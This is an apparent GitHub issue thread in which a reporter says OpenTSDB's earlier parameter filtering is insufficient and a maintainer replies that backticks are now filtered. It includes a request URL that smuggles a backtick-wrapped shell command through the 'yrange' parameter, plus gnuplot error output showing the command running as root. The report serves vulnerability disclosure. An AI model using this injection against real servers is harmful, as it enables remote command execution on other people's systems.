### ISSUE TITLE
parameters need filtering again

### ISSUE THREAD

**Issue by gsocgsoc** [OpenTSDB/opentsdb#953]
Hi,

Regarding to issue #781 

The fixes are not sufficent.

You can change output to json and still run commands remotely as the user running opentsdb.
 
http://xxx.com/q?start=2017/03/20-14:33:00&end=2017/03/20-14:43:33&m=sum:jmxdata.cpu&o=&yrange=[0:]`id`&wxh=1900x772&style=linespoint&json

Result:
`{"err":"<pre>Gnuplot stderr:\nCould not find/open font when opening font \"arial\", using internal non-scalable font\n\nset yrange [0:]uid=0(root) gid=0(root) groups=0(root)\n               ^\n\"/tmp/opentsdb/xxx.gnuplot\", line 11: ';' expected\n\n</pre>"}`

Regards

**Comment by manolama** [comment]
Closing for now at least for back-ticks. There are likely other chars folks an pass in so if anyone knows of them raise another issue and we can filter. Thanks!
